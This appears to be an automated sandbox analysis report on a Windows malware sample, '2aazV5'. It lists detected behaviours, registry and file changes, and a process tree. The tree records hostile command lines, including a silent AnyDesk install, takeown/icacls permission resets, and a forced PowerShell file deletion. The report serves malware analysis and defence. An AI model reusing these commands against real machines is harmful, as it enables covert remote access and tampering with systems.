Analysis Overview
SHA256
b969e4d3c6f3e6a787b6c45f0dd418da1aab11bfffb552c1eaa8c7fc5e23a34b
Threat Level: Likely malicious
The file 2aazV5 was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Loads dropped DLL
Modifies file permissions
Executes dropped EXE
Checks installed software on the system
Drops file in System32 directory
Enumerates physical storage devices
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
NTFS ADS
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Views/modifies file attributes
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Modifies data under HKEY_USERS
Checks processor information in registry
Modifies registry class
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-07 19:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-07 19:24
Reported
2024-06-07 21:19
Platform
win11-20240508-en
Max time kernel
1041s
Max time network
1037s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\stn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Modifies file permissions
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\ProgramData\Anydesk.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Anydesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Anydesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\ProgramData\Anydesk.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3001105534-2705918504-2956618779-1000\{835C56AD-271E-4BAB-BE77-1634B251AB8A} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 790594.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Goonscript.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\2aazV5.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd9ea73cb8,0x7ffd9ea73cc8,0x7ffd9ea73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4848 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=4660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5664 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5768 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5776 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4812 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6732 /prefetch:8
C:\Users\Admin\Downloads\Goonscript.exe
"C:\Users\Admin\Downloads\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A067.tmp\A068.tmp\A079.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A365.tmp\A366.tmp\A367.bat C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
